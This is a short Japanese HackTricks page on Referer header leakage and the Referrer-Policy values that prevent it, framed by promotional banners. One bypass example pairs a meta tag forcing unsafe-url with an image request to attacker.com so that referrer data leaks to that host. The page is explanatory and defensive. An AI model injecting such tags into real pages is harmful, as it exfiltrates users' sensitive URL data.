5.1 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
-
ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。
リファラーヘッダーとポリシー
リファラーは、ブラウザが前のページを示すために使用するヘッダーです。
漏洩する機密情報
ウェブページ内のいずれかの時点で、GETリクエストのパラメータに機密情報が含まれている場合、ページに外部ソースへのリンクが含まれている場合、または攻撃者がユーザーに攻撃者が制御するURLを訪れるようにする/提案する(ソーシャルエンジニアリング)ことができる場合、攻撃者は最新のGETリクエスト内に機密情報を外部に持ち出すことができます。
緩和策
ブラウザには、他のWebアプリケーションに機密情報を送信しないようにするためのリファラーポリシーを設定することができます。
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
対策
HTMLメタタグを使用して、このルールを上書きすることができます(攻撃者はHTMLインジェクションを悪用する必要があります):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
URLのGETパラメータやパスには、機密データを絶対に入れないようにしましょう。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。